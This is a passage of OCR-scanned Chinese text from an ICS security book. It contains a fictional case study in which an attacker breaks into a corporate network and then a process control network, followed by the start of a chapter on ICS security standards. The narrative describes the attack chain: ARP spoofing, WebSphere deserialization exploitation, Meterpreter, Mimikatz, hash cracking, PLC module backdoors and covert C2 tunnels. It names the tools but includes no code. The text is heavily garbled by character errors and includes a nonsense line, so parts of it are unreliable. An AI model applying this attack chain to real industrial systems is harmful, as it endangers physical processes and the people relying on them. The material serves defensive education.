行 漏洞 扫描 是 没有 问题 的 。 这 些 产 品 都 适合 开展 渗透 测试 ， 但 同时 它们 也 会 生成 过 多 的 网 络 流量 ， 而 且 还 具有 已 知 特征 。 因 此 ，Proph 认 为 利用 现 有 市 面 上 的 扫 
摘 器 进行 漏洞 扫 摘 肯定 会 被 检测 到 。 大 多 数 1Ds 都 是 基于 特征 的 ， 这 意味 着 它们 通过 对 已 知 模式 和 特征 进行 匹配 来 识别 攻击 。 但 是 对 于 功能 强大 的 IDS， 即 使 是 过 
多 的 端口 扫描 也 可 以 触发 IDS 报 警 。 常 见 的 规避 技术 是 “低频 、 慢 速 ”， 即 希望 以 比 IDS 警 报 阐 值 更 慢 的 频率 进行 扫描 。 如 果 Proph 有 充足 的 时 间 ， 那 么 这 是 一 种 
好 方法 。 时 间 是 他 相对 于 专业 渗透 测试 人 员 所 享有 的 一 个 优势 。 渗 透 测试 人 员 受 限于 项 目 周期 以 及 测试 规则 中 所 分 配 的 时 间 ， 通 常 仪 仅 只 有 一 两 个 星期 。 然 
而 ，Proph 没 有 这 样 的 限制 。 他 唯一 的 限制 是 他 的 “老板 ”强加 的 。 因 此 ，Proph 不 仅 有 充足 的 时 间 ， 而 且 在 技术 开展 上 提前 于 进度 安排 。 


Proph 注 意 到 有 几 个 工作 站 打开 了 3389 端 口 ， 开 放 了 远程 桌面 协议 (Remote Desktop Protocol, RDP) 服务 。 于 是 ， 他 决定 通过 ARP 投 毒 ， 对 开放 RDP 服 
务 的 工作 站 逐个 进行 中 间 人 攻击 ， 看 看 能 否 抓 取 几 个 密码 散 列 。 这 可 能 需要 一 段 等 待 时 间 ， 所 以 在 此 期 间 他 决定 小 心 仔细 查看 看 在 网 络 上 开放 了 哪些 Web 服 务 。 


“Bingo! ”他 发 现 了 一 台 运 行 某 一 特定 版 本 IBM WebSphere 的 Windows 应 用 程序 服务 器 ， 该 版 本 的 WebSphere 存 在 一 个 Java 对 象 反 序列 化 漏洞 。 这 是 
2015 年 发 现 的 一 个 重要 漏洞 。 即 使 是 对 于 最 新 版 本 的 WebLogic、Websphere、JBoss、Jenkins 和 OpenNMSs 产 品 ， 攻 击 者 利用 该 漏洞 也 可 以 获取 完整 的 远程 控 
制 权 。 由 于 缺少 相关 的 新 闻 报 道 ， 所 以 现实 中 存在 大 量 包含 漏洞 的 系统 。Proph 知 道 他 可 以 很 轻松 地 利用 一 个 专门 针对 这 种 漏洞 的 工具 ysoserial 对 漏洞 进行 利 
用 。 昌 然 Java 对 象 肥 序列 化 漏洞 相对 较 新 ， 但 他 还 是 希望 确保 攻击 载 丛 百 分 百 不 会 被 防 病毒 系统 或 1DS 发 现 。 在 使 用 ysoserial 之 前 ，Proph 需 要 使 用 名 为 
msfvenom 的 规避 工具 对 攻击 载 倚 进行 编码 。 


“你 现在 是 我 的 了 。” 当 Proph 成 功 地 利用 了 该 漏洞 ， 执 行 了 用 于 创建 Metasploit 反 向 Meterpreter shell 的 代码 时 ， 他 模仿 黑 武士 “ 达 斯 维 达 ” 的 口吻 说 


道 。 


现在 ， 既 然 他 已 经 有 了 Meterpreter shell， 利 用 migrate 后 渗透 测试 模块 可 以 确保 他 能 够 以 提升 的 权限 运行 。 一 旦 作为 系统 级 进程 运行 之 后 ， 他 就 加 载 了 交 
互 式 的 PowerShell 模 块 ， 然 后 执行 Mimikatz 后 渗透 测试 模块 ， 以 便 从 主机 转 储 散 列 和 明文 证 书 。 


“完美 ，”Proph 对 自己 说 道 “ 域 证 书 。” 


在 Proph 对 RDP 主 机 的 中 间 人 攻击 中 ， 也 得 到 了 几 个 NTLM 散 列 值 ，Proph 把 这 几 个 散 列 值 输 入 到 他 那 配 有 两 颗 高 端 SPU 的 工作 站 上 的 hashcat 工 具 中 。 他 很 
有 希望 在 短 时 间 内 将 其 破解 。Hashcat 是 一 款 运行 快速 、 高 效 的 口令 破解 工具 ， 而 对 于 装备 有 一 颗 或 多 颗 高 端 ShPU 的 计算 机 而 言 ， 例 如 游戏 计算 机 ， 由 于 其 内 置 
了 多 颗 处 理 核 心 而 县 具备 并 行 处 理 能 力 ， 因 此 也 常常 用 于 口令 破解 。 多 颗 处 理 核 心 与 并 行 处 理 能 力 的 结合 是 一 种 令 人 和 捷 的 口令 破解 配置 。 口 令 复 用 是 一 种 常见 
的 做 法 (也 是 一 种 常见 的 错误 ) ， 因 此 Proph 只 需要 获取 几 个 特权 口令 就 能 够 进行 内 网 拓展 从 而 访问 网 络 中 的 多 台 主 机 。 


Proph 在 公司 网 络 中 搜集 证 书 并 进行 转 储 ， 然 后 带 着 这 些 证 书 “ 跳 路 ”到 新 主机 上 并 多 次 重复 这 一 过 程 ， 但 是 他 还 没有 找到 一 个 可 以 访问 过 程控 制 网 络 的 主 
机 。 可 能 是 因为 近期 安 凌 了 Windows7 更 新 的 缘故 ，Proph 获 得 的 所 有 证 书 未 必 和 针对 每 台 主 机 都 能 奏效 ， 而 散 列 传递 攻击 (pass-the-hash) 也 难以 奏效 。 这 是 一 
个 匈 繁 的 过 程 。 他 希望 hashcat 能 够 完成 它 的 工作 并 得 到 一 些 有 价值 的 东西 。 每 一 跳 后 ， 他 还 要 确保 对 他 的 行 趴 进行 了 覆盖 与 “清理 ”， 现 在 他 终于 有 点 想 睡 党 
Te 


几 天 来 ，Proph 将 刚刚 拿 下 的 网 络 翻 了 个 底 朝 天 一 期 间 他 还 趁 hashcat 运 行 的 时 间 里 打 了 几 盘 网 络 游戏 好 好 放松 了 一 下 ， 之 后 ， 他 终于 有 了 一 个 突破 。 
“搞定 ! ”Proph 欢 呼 道 。 


hashcat 破 解 了 一 个 散 列 并 得 到 了 明文 密码 。 他 折 回 到 获取 该 散 列 的 RDP 主 机 进行 检查 ， 并 通过 RDP 使 用 证 书 登录 上 了 主机 。 经 过 一 秋 仔 细 研 究 ，Proph 注 意 
到 刚刚 用 来 登录 的 证 书 中 有 一 些 有 趣 的 东西 。 


"Jim? 是 你 吗 ? " 

Proph 回 来 翻 看 了 之 前 的 面 斌 记录。 果然， 他 获得 了 Jim 的 证 书 ， 正 是 之 前 面试 自己 的 高 级 工程 师 。 

“确实 有 意思 。 " 

Phoph 继 续 对 现在 已 获得 访问 权限 的 工作 站 进行 检查 。 当 他 检查 到 主机 网 络 配置 时 ， 肿 恶 的 笑容 浮现 在 他 的 脸 上 。 
“你 是 双 宿 主 ，” 他 说 道 。 “Bingol " 


Proph 访 问 了 Jim 的 双 宿 主 工 作 站 ， 该 工作 站 与 过 程 网 络 相 连接 。Proph 如 释 重 负 ， 因 为 他 已 经 制订 出 了 下 一 步 工作 的 策略 : 伪造 一 个 厂商 的 网 站 ， 然 后 向 网 
站 上 传 木 马 化 的 固件 版 本 或 应 用 程序 更 新 ， 并 借助 社会 工程 学 中 的 技 5 诱 骗 jim 或 他 的 某 个 工程 师 去 下 载 。 这 样 的 策略 Proph 在 过 去 百 试 不 爽 ， 但 这 些 策略 仍然 需 
要 相当 多 的 时 间 进 行 设 置 部 署 ， 同 时 也 需要 一 些 运气 才能 够 实施 成 功 。 


但 是 ， 现 在 Proph 已 经 有 了 一 个 立足 之 地 。 他 开发 了 一 个 后 门 并 且 掩 盖 其 行路 。 接 下 来 ，Proph 的 计划 是 找到 在 过 程控 制 网 络 中 Jim 可 以 访问 的 工程 师 站 以 及 


是 ， 
其 他 资产 ， 也 许 通 过 搜索 网 络 拓 扑 图 和 其 他 有 用 的 文档 就 可 以 做 到 这 一 点 ， 并 完成 最 后 阶段 的 内 容 。 
“现在 ， 我 准备 好 开始 下 一 步 了 ，Jim。 ”Proph 得 意 地 说 道 。 


他 的 现任 “老板 ”也 会 很 高 兴 的 。 


延伸 阅读 


e Websphere Application Server, Security Vulnerabilities, CVE Details (https://www. 
cvedetails.com/vulnerability-list/vendor_id-14/product_id-576/cvssscoremin-9/ 
cvssscoremax-/IBM-Websphere-Application-Server.html) 


e Ysoserial (https://github.com/frohoff/ysoserial) 


e “What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application 
Have in Common? This Vulnerability,’ by breenmachine, November 6, 2015 
(http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss- 
jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 
#thevulnerability) 


e metasploit-framework (https://github.com/rapid7/metasploit-framework/wiki/ 
How-to-use-msfvenom) 


e “Post-exploitation Using Meterpreter,’ by Shubham Mittal (https://www.exploit-db. 
com/docs/18229.pdf ) 


e Meterpreter Basic Commands, Offensive Security (https://www.offensive-security. 
com/metasploit-unleashed/meterpreter-basics/ ) 


e Interactive PowerShell Sessions within Meterpreter, June 2015 (https://www.trustedsec. 
com/june-2015/interactive-powershell-sessions-within-meterpreter/ ) 


e Mimikatz, Offensive Security (https://www.offensive-security.com/metasploit- 
unleashed/mimikatz/) 


e hashcat (http://hashcat.net/hashcat/) 


e Microsoft Security Advisory 2871997, Microsoft TechNet, updated February 9, 2016 
(https://technet.microsoft.com/library/security/287 1997) 
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案例 研究 ”第 五 部 分 : 何去何从 


Proph 知 道 在 过 程 网 络 中 ， 除 了 人 机 界面 所 监控 的 进程 和 系统 之 外 ， 很 有 可 能 没有 部 署 入 侵 检测 系统 ， 而 且 也 没有 其 他 监控 措施 。 他 不 需要 像 入 侵 公司 网 络 
时 那样 小 心 翼 翼 以 防 被 上 友 现 ， 但 是 他 仍然 需要 谨慎 行事 。 大 部 分 数字 过 程 设备 ， 比 如 可 编程 序 控制 器 和 远程 终端 单元 ， 在 面 对 即 使 非常 简单 的 端口 扫 摘 一 类 的 轻 
量 级 入 侵 时 也 表现 得 难以 尽 如 人 意 。Proph 最 不 希望 的 就 是 通过 “月 漠 ” 设 备 使 操作 员 和 工程 师 焦躁 不 安 了 。 无 论 是 令 设备 重 置 、 出 现 故 障 ， 还 是 把 它们 变 
成 “人 砖头 ”， 都 会 影响 操作 员 对 所 操作 系统 或 进程 的 看 法 和 (或 ) 控制 。 如 果 他 们 发 现 了 故障 并 开始 着 手 处 理 ， 那 么 Proph 的 所 有 行动 和 进展 被 友 现 的 可 能 性 将 
大 大 增加 。 


利用 Jim 的 口令 ，Proph 友 现 目 己 似乎 拥有 了 所 有 他 感 兴趣 的 数字 资产 的 访问 权限 。Proph 认 真 翻 看 了 工业 实时 历史 数据 库 中 的 内 容 ， 熟 悉 了 一 下 以 往 的 记 
录 、 所 拥有 的 设备 类 型 和 标签 种 类 及 数量 。 几 个 小 时 后 ， 他 把 整个 过 程 网 络 的 架构 详细 地 绘制 了 出 来 ， 并 在 几 人 台 防 护 落 弱 的 SAP 工 作 站 中 找到 了 两 三 张 不 完整 的 
Visio 网 络 拓扑 图 和 一 张 有 些 过 时 的 IP 地 址 表 。 利 用 精心 构造 的 ARP 请 求 和 一 个 名 为 “p0f” 的 工具 ，Proph 便 通过 活跃 的 主机 和 设备 对 友 现 的 IP 地 址 进行 了 验证 ， 
其 中 p0f 能 够 采用 被 动 识别 技术 识别 出 操作 系统 及 其 他 来 自 活跃 主机 和 设备 的 信息 。 


标 绘 网 络 以 构图 是 一 回 事 ， 而 理解 控制 过 程 则 是 另外 一 回 事 。 到 了 现在 这 个 阶段 ，Proph 已 经 可 以 做 很 多 事情 了 ， 所 造成 的 影响 也 各 不 相同 ， 例 如 修改 一 个 


或 多 个 PLC、 牌 改 工业 实时 历史 数据 库 和 标签 数据 等 。 但 是 ， 这 些 攻击 大 部 分 都 是 一 次 性 的 ， 不 会 导致 实质 性 的 后 果 。 如 果 不 理解 控制 过 程 ， 那 么 大 多 数 结果 都 
是 无 法 预测 的 。 而 Proph 的 老板 要 求 的 则 是 ， 获 取 对 整个 过 程 系 统 近 平 完全 的 控制 。 


Proph 论 费 了 好 几 天 分 析 网 络 流量 、 人 机 界面 和 工业 实时 历史 数据 库 。 他 的 目的 是 弄 明 白 并 描绘 出 每 一 个 PLC 线 圈 和 (或 ) 寄存 器 所 关联 的 过 程 功 能 。PLC 线 
圈 以 数字 量 为 输入 ，PLC 寄 人 存 器 则 以 模拟 量 为 输入 。 如 果 不 明白 这 些 设 备 所 关联 的 过 程 功 能 ， 那 么 Proph 即 使 修改 了 线圈 的 数值 ， 也 完全 无 法 预料 修改 后 所 引起 的 
结果 。 为 了 真正 地 控制 这 些 设备 ， 他 需要 知道 这 些 线圈 和 寄存 器 都 关联 了 哪些 内 容 。 虽 然 编 写 了 几 个 Python 脚本 能 够 帮助 自动 化 实现 这 一 过 程 ， 但 他 还 是 耗费 了 
很 多 天 进行 手动 和 自动 分 析 才 获得 了 大 部 分 的 天 联 功能 。 


现在 ，Proph 已 经 拥有 了 所 需要 的 一 切 资 源 来 实现 他 的 终极 计划 ， 那 就 是 开发 一 套 功 能 完善 的 攻击 指控 系统 。 他 可 以 针对 工程 师 站 编写 Rootkit 或 者 木马 化 软 
件 ， 但 是 这 样 做 就 意味 着 为 了 覆盖 掉 PLC 的 安全 逻辑 ，Proph 将 不 得 不 擦 除 PLC 的 原 有 远 辑 然后 上 传 新 逻辑 至 PLC..……. 而 且 是 每 一 个 PLC。 这 个 方案 非常 复杂 并 且 极 
有 可 能 被 友 现 。 而 要 想 从 PLC 上 找到 一 个 老式 的 缓冲 区 溢出 漏洞 ， 然 后 尝试 利用 远程 代码 执行 (Remote Code Execution, RCE) 的 方式 发 起 攻击 也 是 一 件 非常 
困难 的 事 ， 还 很 有 可 能 会 把 PLC 变 成 “砖头 ”。 


不 过 ，Proph 注 意 到 大 多 数目 标 PLC 会 用 到 的 网 络 模块 都 运行 在 某 个 基于 BusyBox 的 Linux 系 统 之 上 ， 而 该 Linux 版 本 恰好 是 一 个 存在 漏洞 的 版 本 。 他 想起 了 
Black Hat2013 黑 帽 大 会 上 的 一 次 演讲 ， 会 上 Eric Forner 和 Brian Meixell 两 名 研究 人 员 演 示 了 如 何 针对 网 络 模块 开展 漏洞 利用 从 而 实现 直接 向 PLC 写 入 命令 的 目 
的 ， 并 对 返回 至 人 机 界面 的 响应 进行 鞭 骗 。 结 果 他 们 利用 这 种 方式 成 功 地 控制 了 PLC， 并 且 完 全 绕 过 了 安全 逻辑 ， 同 时 人 机 界面 对 此 毫 不 知情 。 这 正 是 Proph 要 编 
写 的 代码 的 核心 所 在 。 


Proph 随 后 用 了 几 天 时 间 开 发 出 了 攻击 载 倚 ， 以 用 于 在 每 一 个 存在 漏洞 的 网 络 模块 中 插入 代理 。 该 代理 和 攻击 指控 (Command and Control, C2) 服务 器 
将 拥有 所 有 正确 的 线圈 关联 以 友 送 适当 的 指令 至 PLC， 并 且 能 通过 对 友 回 人 机 界面 的 响应 信息 进行 欺骗 来 掩盖 自己 的 所 作 所 为 。Proph 还 为 每 一 个 存在 漏洞 的 工程 
师 站 、 工 业 实 时 历史 数据 库 和 服务 器 编写 了 Rootkit。 访 问 过 程 中 将 使 用 代理 以 jim 的 工作 站 为 跳板 通过 加 密 的 反 向 隧道 建立 连接 ， 并 采用 DNS、SMPT、HTTP 等 
多 种 通用 协议 进行 流量 隐藏 。Proph 将 利用 它 所 友 现 的 其 他 一 些 拥 有 过 程控 制 网络 (Process Control Network, PCN) 访问 权限 的 数字 资产 作为 备用 跳板 。 他 
知道 自己 定制 开发 的 这 段 代 码 几乎 不 会 被 基于 特征 码 检测 的 反 病 毒 软件 或 入 侵 检测 系统 发 现 ， 尤 其 是 在 过 程控 制 网 络 里 ， 但 他 还 是 决定 对 代码 进行 编码 与 混淆 处 
理 。 加 密会 话 通 过 隧道 进行 传输 ， 而 隧道 采用 常用 协议 进行 封装 ， 因 此 能 够 在 企业 网 络 中 实现 通信 隐藏 ， 从 而 规避 各 种 流量 检测 。Proph 会 在 仿真 实验 室 中 对 所 
有 代码 进行 测试 并 调试 ， 当 一 切 都 运转 正常 时 ， 束 可 以 部 署 了 。 


付款 日 


当 Proph 看 到 自己 刷新 的 比特 币 余 额 时 ， 他 笑 了 。 接 下 来 Proph 将 有 很 长 一 段 时 间 不 需要 工作 了 ， 但 是 他 热爱 自己 所 做 的 一 切 。 在 短 短 的 几 个 月 里 ，Proph 就 
成 长 为 了 一 名 能 够 对 控制 系统 进行 漏洞 利用 的 专家 ， 入 侵 并 控制 了 一 个 过 程控 制 网 络 ， 还 安装 了 一 套 攻 击 指控 系统 ， 借 助 该 套 系统 无 论 是 谁 进行 操作 都 能 够 获取 
到 目标 系统 的 控制 权 ， 这 些 目标 可 以 包括 工程 师 站 、PLC、 工 业 实 时 历史 数据 库 、 服 务 器 等 对 象 ， 实 质 上 就 是 整个 过 程控 制 网 络 及 其 控制 的 所 有 现场 设备 。 攻 击 
指控 系统 静 静 地 潜伏 着 ， 不 会 被 任何 人 友 现 ， 直 到 它 的 新 主人 将 它 印 载 。 


当前 工业 控制 系统 环境 中 存在 大 量 类 似 于 上 文 提 到 的 目标 ， 这 意味 着 对 工控 系统 友 起 攻击 的 条 件 已 经 非常 成 熟 了 。 不 稳定 的 目标 、 存 在 漏洞 的 目标 、 示 进行 
正确 隔离 的 网 络 、 配 置 不 当 的 防火 墙 规 则 、 未 经 规范 培训 的 员工 、 形 同 虚 设 的 安全 策略 、 过 时 并 且 示 打 补 丁 的 主机 和 设备 ， 以 及 有 效 监 控 和 入 侵 检 测 系 统 的 缺 
失 ， 这 些 问 题 都 为 攻击 埋 下 了 种 种 隐患 。Proph 非 常 期 待 下 一 个 付款 日 ， 因 为 他 很 确定 这 只 不 过 是 个 时 间 间 题 去 了 。 


延伸 阅读 


e Out of Control: Demonstrating SCADA Exploitation, by Eric Forner and Brian 
Meixell, Black Hat 2013 (https://www.youtube.com/watch?v=UwHtR2DCN5U) 
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政府 和 行业 机 构 分 别 为 不 同行 业 定 义 了 众多 安全 标准 、 指 导 和 “最 佳 实践 ” (best practices) ， 这 些 标准 、 指 南 等 文献 和 出 版 物 都 对 工控 系统 的 安全 提出 了 
建议 和 (或 ) 要 求 ， 其 中 根据 所 处 行业 的 不 同 ， 要 求 在 强制 执行 过 程 中 借助 行政 处 罚 与 罚款 的 形式 予以 推行 。 直 到 几 年 前 ， 大 部 分 资料 还 都 只 是 关注 于 常规 的 信 
息 安全 领域 。 不 过 ， 针 对 工业 领域 (也 就 是 工业 控制 系统 ) 的 安全 标准 数量 正在 显著 增长 。 


与 工控 系统 相关 的 常见 安全 标准 主要 包括 : 
. 美 家 标准 与 技术 研究 院 (National Institute of Standards and Technology, NIST) 制订 的 NIST SP800-82 指 南 ; 


- 国际 自动 化 协会 (International Society of Automation, ISA) /国际 电工 委员 会 (Inter-national Electrotechnical Commission, IEC) 制订 的 62443 标 准 (前 身 是 


ISA-99， 也 被 称 作 ISA62443 和 IEC62443 标 准 ) ; 
. 北美 电力 可 靠 性 委员 会 (North American Electric Reliability Corporation, NERC) 制订 的 关键 设施 保护 可 靠 性 标准 (Critical Infrastructure Protection, CIP) ; 
. 美国 石油 协会 (Ametican Petroleum Institute, API) 制订 的 1164 标 准 ， 即 《油气 管道 监控 与 数据 采集 系统 安全 》 (Pipeline SCADA Security) ; 
(x LEASH TAC LARGE hp ESR YE (Chemical Facility Anti-Terrorism Standards, CFATS) ; 
- 美国 核能 管理 委员 会 (U.S.Nuclear Regulatory Commission, NRC) 制订 的 标准 ; 
- 美国 核能 研究 所 (Nuclear Energy Institute, NEI) 制订 的 08-09 标 准 ; 
` 美国 国家 标准 与 技术 研究 院 制 订 的 网 络 安全 框架 ; 
` 美国 国家 标准 与 技术 研究 院 制 订 的 NIST SP800-53 建 议 。 
全 球 性 的 安全 标准 包括 : 
- ISO/IEC27001 和 27002 标 准 (其 中 ISO-27002 标 准 2013 版 《信息 安全 控制 实用 规则 》[Code of Practice for Information Security Controls] 被 广泛 采用 ) 。 
欧洲 的 安全 标准 和 指南 包括 : 
` 欧盟 M/490 标 准 化 要 求 (EUM/490) 和 智能 电网 协调 小 组 (Smart Grid Coordination Group, SGCG) 对 现代 电力 系统 提出 的 指南 建议 ; 
` 欧盟 网 络 与 信息 安全 局 (European Union Agency for Network and Information Security) 提出 的 多 项 指南 。 


毫 无 疑问 ， 被 广泛 认可 且 普 遍 应 用 的 三 项 工控 系统 安全 标准 分 别 是 NIST SP800-82, ISA/IEC6244340NERC CIP, EHH, NIST SP800-82 和 ISA/IEC62443 两 
项 标准 应 用 在 所 有 使 用 工控 系统 的 机 构 或 行业 中 ， 而 NERC CIP 主 要 应 用 于 电力 行业 ， 虽 然 该 项 标准 也 普遍 用 于 石油 与 天 然 气 行业 。 


本 章 主要 介绍 工控 系统 的 安全 标准 概况 ， 并 对 安全 标准 相关 的 控制 规范 进行 简要 说 明 。 我 们 的 目的 是 了 解 工控 系统 中 使 用 最 广泛 的 安全 标准 并 对 其 关键 特点 
予以 强调 ， 而 并 不 打算 对 所 有 工控 系统 标准 进行 详细 的 解释 (也 不 打算 对 通用 信息 安全 标准 进行 深入 细致 的 介绍 ) 。 本 章 不 是 安全 标准 的 合 规 指南 ， 并 不 是 因为 
合 规 不 重要 ， 而 是 因为 在 这 方面 已 经 出 版 了 很 多 详细 的 资料 可 供 参 考 。 应 将 本 章 作为 风险 评估 和 渗透 测试 过 程 中 相关 标准 的 高 级 实施 指南 。 了 解 其 他 标准 中 的 内 
容 通常 对 于 遵循 某 项 特定 的 安全 标准 的 相关 人 员 也 能 够 有 所 帮助 。 通 过 参考 其 他 标准 ， 在 可 能 人 存在 的 差距 和 (或 ) 需要 部 署 哪些 对 抗 措施 等 方面 可 以 获得 更 广泛 
更 深入 的 了 解 。 此 外 ， 对 不 同 标准 的 需求 类 别 进行 “横向 比 对 ” (cross-mapping) 同样 也 是 个 好 的 思路 。 

NIST 网 络 安全 框架 (http://www.nist.gov/cyberframework/upload/cybersecurity-frame-work-021214.pdf) 从 第 20 页 (第 1 版 ) 开始 ， 从 不 同 的 类 别 对 
网 络 安全 标准 进行 了 出 色 、 详 尽 且 是 最 新 的 (LIAB) 横向 比 对 。 它 所 参考 的 唯一 一 项 工控 系统 安全 标准 是 ISA62443 标 准 ， 不 过 其 他 标准 也 提供 了 类 
似 的 横向 比 对 ， 如 NIST SP800-82 残 提供 了 与 NIST SP800-53 的 对 比 。 

最 后 ， 还 有 部 分 安全 标准 并 不 适用 于 工控 系统 体系 ， 而 适用 于 工控 系统 产品 厂商 。 这 些 标准 包括 国际 通用 准则 (Common Criteria) 标准 和 不 同 的 联邦 信息 


处 理 标准 (Federal Information Processing Standards, FIPS) 。 本 章 主要 讨论 针对 工控 系统 体系 安全 的 安全 标准 ， 但 厂商 们 也 应 对 其 他 适合 自身 情况 的 标准 
予以 关注 。 


91 合 规 性 与 安全 性 


不 论 我 们 所 在 的 机 构 使 用 哪 种 安全 标准 ， 都 要 记 住 这 些 安全 标准 在 工业 领域 所 面 对 的 对 象 是 庞大 而 多 样 的 。 因 此 ， 在 自身 所 处 的 工控 系统 架构 中 应 用 标准 时 
要 格外 注意 。 大 多 数 标 准 针对 的 是 工控 系统 中 的 一 般 要 求 ， 所 以 虽然 的 确 能 够 为 某 些 特定 的 网 络 安全 控制 措施 提供 指南 、 建 议 与 (或 ) 强制 性 要 求 ， 但 是 每 一 个 
不 同 的 公司 或 环境 都 有 其 各 自 的 错综复杂 之 处 或 是 细 枝 术 节 的 差别 ， 因 此 任何 一 项 安全 标准 都 不 可 能 成 为 “万 金 油 ”。 即 便 同 一 家 公司 内 部 相同 的 处 理 过 程 也 可 
能 由 于 投入 使 用 的 日 期 、 系 统 的 更 新 和 移植 ， 以 及 日 常 维护 的 不 同 而 造成 站 点 之 间 的 差异 。 因 此 ， 提 出 任何 一 项 建议 都 应 该 进行 慎重 的 考虑 ， 尤 其 是 要 将 所 在 工 
控 系 统 环境 自身 的 独特 性 考虑 在 内 。 


aA 


要 记 住 ， 符 合 某 项 安全 标准 ， 甚 至 符合 多 项 安全 标准 ， 并 不 代表 就 一 定安 全 1 


9.2 ”常见 的 工控 系统 网 络 安全 标准 


美国 和 国际 上 的 一 些 管 理 标准 组 织 参与 了 工控 系统 网 络 安全 标准 的 制订 。 在 美国 和 加 拿 大 ， 北 美 电力 可 靠 性 委员 会 以 其 制订 的 关键 设施 保护 可 靠 性 标准 
(NERC CIP) 而 闻名 遐 逮 ， 该 标准 应 用 于 北美 主干 电力 系统 的 安全 监管 。 北 美 电 力 可 靠 性 委员 会 独立 于 联邦 能 源 管理 委员 会 (Federal Energy Regulatory 
Commission, FERC) 单独 运营 ， 联 邦 能 源 管 理 委 员 会 主要 管理 天 然 气 、 石 油 和 电力 的 州 际 间 运 输 ， 审 查 液化 天 然 气 (liquefied natural gas, LNG) 接收 站 和 
州 际 天 然 气 管道 的 规划 建设 方案 ， 并 对 水 电工 程 项 目 进行 审批 。 美 国 能 源 部 (Department of Energy, DOE) 和 国土 安全 部 (Department of Homeland 
Security, DHS) 也 皮 布 了 一 系列 安全 建议 和 要 求 ， 包 括 化 工 设 备 反 恐怖 主义 标准 (CFATS) 。 该 标准 参考 了 多 项 具有 针对 性 的 美国 国家 标准 与 技术 研究 院 特 别 
出 版 物 ， 尤 其 是 SP800-53《 联 邦 信息 系统 和 组 织 安全 控制 建议 》 (Recommended Security Controls for Federal Information Systems and Organizations) 
和 SP800-82《 工 业 控制 系统 安全 指南 》 (Guide to Industrial Control Systems[ICS]Security) 。 英 国 国家 基础 设施 保护 中 心 (National Centre of the 
Protection of National Infrastructure, CPNI) 也 参与 了 SP800-82 指 南 最 新 版 的 修订 工作 。 国 际 自动 化 协会 制订 的 《工业 自动 化 控制 系统 安全 标准 》 
(ISA62443) 也 为 工控 系统 的 安全 提供 了 参考 意见 。 


9.2.1 NIST SP800-82 


美国 国家 标准 与 技术 研究 院 于 2015 年 5 月 友 布 了 最 新 版 的 ?P800-82《 工 业 控 制 系统 安全 指南 》 (第 2 版 ) ， 包 括 了 从 安全 、 管 理 、 运 曹 和 技术 控制 等 方面 提 
出 的 中 在 改善 工控 系统 安全 性 的 诸多 建议 。 该 项 标准 主要 由 建议 而 不 是 强制 执行 的 硬性 规定 组 成 。 第 2 版 内 容 非 钊 详尽， 并且 同 ?P800-53《 联 邦 信息 系统 和 机 构 
安全 控制 建议 》 进 行 了 对 照 ， 与 前 一 版 相 比 ， 第 2 版 实现 起 来 更 容易 。 在 第 2 版 中 主要 包括 : 


. 对 工控 系统 威胁 和 漏洞 的 更 新 ; 

` 对 工控 系统 风险 管理 、 实 践 建议 及 架构 的 更 新 ; 

` 对 工控 系统 安全 中 当前 活动 的 更 新 ; 

` 对 工控 系统 中 安全 功能 和 工具 的 更 新 ; 

- 与 其 他 工控 系统 安全 标准 和 指南 保持 一 致 的 调整 ; 

- 针对 NIST SP800-53 第 4 版 中 安全 控制 措施 新 制订 的 指南 ， 包 括 对 覆盖 [1 (overlays) 概念 的 介绍 ; 

- 针对 NIST SP800-53 第 4 版 中 安全 控制 措施 提供 的 工控 系统 覆盖 ， 分 别 为 低 、 中 、 高 影响 级 别 的 工控 系统 提供 了 安全 控制 基线 。 

NIST SP800-82 指 南 是 许多 使 用 工控 系统 的 公司 的 安全 标准 基线 ， 并 且 被 很 多 其 他 出 版 物 广泛 引用 。 该 项 标准 自 创 建 以 来 ， 经 过 漫长 的 演变 至 今 已 发 展 成 为 
一 项 较为 全 面 的 工控 系统 安全 标准 ， 对 任何 工控 系统 安全 程序 来 说 ，SP800-82 指 南 不 仪 是 重要 的 参考 资料 ， 也 是 非常 有 价值 的 参考 资源 。 


9.2.2 ISA/IEC62443 


ISA62443 (前 身 为 |SA-99) 实际 上 是 一 系列 标准 ， 共 分 四 类 前 述 了 关于 实现 安全 的 工业 自动 化 控制 系统 (Industrial Automation and Control 
System, IACS) 所 必需 的 众多 主题 。 该 项 标准 源 自 于 1SA-99 标 准 ， 当 前 也 同 IEC62443 标 准 保持 一 致 。 国 际 标准 化 组 织 (International Organization for 
Standardization, ISO) 对 该 标准 重新 进行 修订 并 加 以 整理 ， 然 后 将 其 采纳 为 |S962443 标 准 。 在 本 书 撰写 时 ，1SA62443 标 准 的 部 分 文档 已 经 得 以 出 版 并 被 IEC 所 
采纳 ， 而 其 他 文档 仍然 在 撰写 过 程 中 。 因 此 ， 读 者 最 好 直接 参考 国际 标准 化 组 织 官网 (http://www.ISA.org) 上 所 发 布 的 最 新 文档 。 要 注意 的 是 ，1SA62443 标 准 
并 不 免费 ， 需 要 购买 才能 获得 。 图 9-1 展 示 了 ISA62552 系 列 标准 的 组 织 结构 。 


9.2.3 NERC CIP 


许多 工控 系统 网 络 安 全 讨论 通常 都 会 涉及 NERC CIP 标 准 。 由 于 该 项 标准 属于 强制 性 标准 ， 知 不 合 规 将 会 受到 严厉 惩处 ， 因 此 被 广泛 诉 病 。NERC 的 主要 任务 
是 改善 北美 主干 电力 系统 的 可 靠 性 和 安全 性 。 为 此 ，NERC 开 展 了 一 系列 工作 ， 包 括 制订 并 强制 执行 可 靠 性 标准 ， 监 控 主 干 电 力 系统 ， 评 估 机 构 能 否 满足 未 来 的 充 
裕 性 ， 审 计 所 有 者 、 操 作 员 和 用 户 的 防范 准备 工作 是 否 充分 ， 以 及 对 从 业 人 员 进 行 培训 。NERC 依 靠 行业 参与 者 在 多 个 不 同 领 域 的 专业 知识 技能 及 集体 智慧 ， 实 施 
自我 监管 。 作 为 电力 可 靠 性 组 织 (Electric Reliability Organization, ERO) ，NERC 接 受 美 国联 邦 能 源 管 理 委 员 会 和 加 拿 大 政府 机 构 的 审计 。 


NERC 颁 布 了 一 系列 网 络 安全 标准 以 降低 上 电 资源 和 十 万 伏 以 上 的 高 压 输 电 系 统 的 入 侵 风 险 。 这 两 种 基础 设施 也 瓯 是 俗称 的 主干 电力 系统 。 主 干 电 力 系统 包括 
